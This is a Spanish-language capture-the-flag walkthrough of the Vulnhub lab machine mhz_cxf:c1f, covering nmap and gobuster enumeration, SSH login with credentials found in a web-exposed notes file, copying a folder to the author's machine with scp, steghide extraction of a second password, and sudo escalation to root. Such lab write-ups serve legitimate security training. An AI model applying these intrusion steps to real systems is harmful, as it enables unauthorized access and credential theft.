[VLN] mhz_cxf:c1f

Hoy vamos a hackear la maquina de Vulnhub llamada mhz_cxf: c1f. Podeis descargarla desde el siguiente enlace: MHZ_CXF:C1F

Enumeration


Empezamos con un nmap para ver que puertos tiene abiertos.

sml@Cassandra:~$ nmap -A -p- 192.168.1.110
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-02 10:51 CEST
Nmap scan report for mhz_c1f.home (192.168.1.110)
Host is up (0.00045s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 
2.0)
| ssh-hostkey: 
|   2048 38:d9:3f:98:15:9a:cc:3e:7a:44:8d:f9:4d:78:fe:2c (RSA)
|   256 89:4e:38:77:78:a4:c3:6d:dc:39:c4:00:f8:a5:67:ed (ECDSA)
|_  256 7c:15:b9:18:fc:5c:75:aa:30:96:15:46:08:a9:83:fb (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 400 Bad Request
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.67 seconds
Miramos si encontramos algo interesante en el Apache usando gobuster.

sml@Cassandra:~$ gobuster dir -u http://192.168.1.110 -w /usr/share/wordlists/dirb/big.txt -x php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.110
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt
[+] Timeout:        10s
===============================================================
2020/05/02 10:52:31 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.txt (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.txt (Status: 403)
/.htpasswd.php (Status: 403)
/notes.txt (Status: 200)
/server-status (Status: 403)
===============================================================
2020/05/02 10:52:41 Finished
===============================================================
Vemos que hay un fichero llamado notes.txt asi que vamos a verlo: http://192.168.1.110/notes.txt El contenido es: 1- i should finish my second lab 2- i should delete the remb.txt file and remb2.txt Asi que visitamos http://192.168.1.110/remb.txt El contenido es: first_stage:flagitifyoucan1234

Low Shell


Usamos los credenciales que hemos obtenido en el fichero remb.txt para loguearnos por ssh.

sml@Cassandra:~$ ssh first_stage@192.168.1.110
first_stage@192.168.1.110's password: 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-96-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat May  2 08:54:06 UTC 2020

  System load:  0.28              Processes:             97
  Usage of /:   45.1% of 9.78GB   Users logged in:       0
  Memory usage: 20%               IP address for enp0s3: 192.168.1.110
  Swap usage:   0%

28 packages can be updated.
0 updates are security updates.

*** System restart required ***
Last login: Fri Apr 24 18:18:07 2020 from 192.168.5.253
$

user.txt



first_stage@mhz_c1f:~$ pwd
/home/first_stage
first_stage@mhz_c1f:~$ ls
user.txt
first_stage@mhz_c1f:~$ cat user.txt
HEEEEEY , you did it 
that's amazing , good job man

so just keep it up and get the root bcz i hate low privileges ;)

#mhz_cyber

Post Exploitation


Despues de mirar el sistema, hay una carpeta llamada Painting que puede que contenga informacion oculta, asi que la transfiero a mi maquina para ver si con steghide sale algo...

first_stage@mhz_c1f:~$ cd /home/mhz_c1f
first_stage@mhz_c1f:/home/mhz_c1f$ scp -r Paintings/ sml@192.168.1.148:/home/sml/vulnhub/mhz
sml@192.168.1.148's password: 
Russian beauty.jpeg                                                             
                                                   100%  507KB  44.4MB/s   
00:00    
19th century American.jpeg                                                      
                                                   100%  437KB  42.1MB/s   
00:00    
spinning the wool.jpeg                                                          
                                                   100%  905KB  61.7MB/s   
00:00    
Frank McCarthy.jpeg                                                             
                                                   100%  348KB  52.8MB/s   
00:00 

sml@Cassandra:~/vulnhub/mhz/Paintings$ steghide extract -sf spinning\ the\ 
wool.jpeg 
Anotar salvoconducto: 
anot� los datos extra�dos e/"remb2.txt".

sml@Cassandra:~/vulnhub/mhz/Paintings$ cat remb2.txt 
ooh , i know should delete this , but i cant' remember it 
screw me 

mhz_c1f:1@ec1f
Vemos que hemos podido sacar el fichero remb2.txt del fichero spinning the wool.jpg (el password esta vacio), el cual nos da los credenciales de mhz_c1f.

Privilege Escalation



first_stage@mhz_c1f:/home/mhz_c1f$ su mhz_c1f
Password: 
mhz_c1f@mhz_c1f:~$ sudo -l
[sudo] password for mhz_c1f: 
Matching Defaults entries for mhz_c1f on mhz_c1f:
    env_reset, mail_badpass, 
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/
snap/bin

User mhz_c1f may run the following commands on mhz_c1f:
    (ALL : ALL) ALL

mhz_c1f@mhz_c1f:~$ sudo su
root@mhz_c1f:/home/mhz_c1f#

root.txt


Por ultimo, miramos la flag de root.

root@mhz_c1f:~# cat .root.txt
OwO HACKER MAN :D

Well done sir , you have successfully got the root flag.
I hope you enjoyed in this mission.

#mhz_cyber

End


Y con esto ya seriamos root de la maquina :)